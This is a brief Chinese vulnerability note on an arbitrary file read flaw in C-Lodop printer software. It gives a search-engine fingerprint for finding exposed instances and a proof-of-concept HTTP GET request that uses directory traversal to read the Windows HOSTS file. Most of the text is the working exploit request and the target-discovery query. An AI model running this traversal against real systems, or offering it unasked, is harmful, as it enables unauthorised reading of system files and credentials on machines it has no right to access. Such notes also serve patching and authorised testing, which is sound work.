C-Lodop打印机任意文件读取漏洞

漏洞描述

C-Lodop打印机存在任意文件读取漏洞，通过构造特殊URL，可实现读取系统任意文件。

网络测绘

title="C-Lodop"

漏洞复现

poc：

GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1
Host: 127.0.0.1
....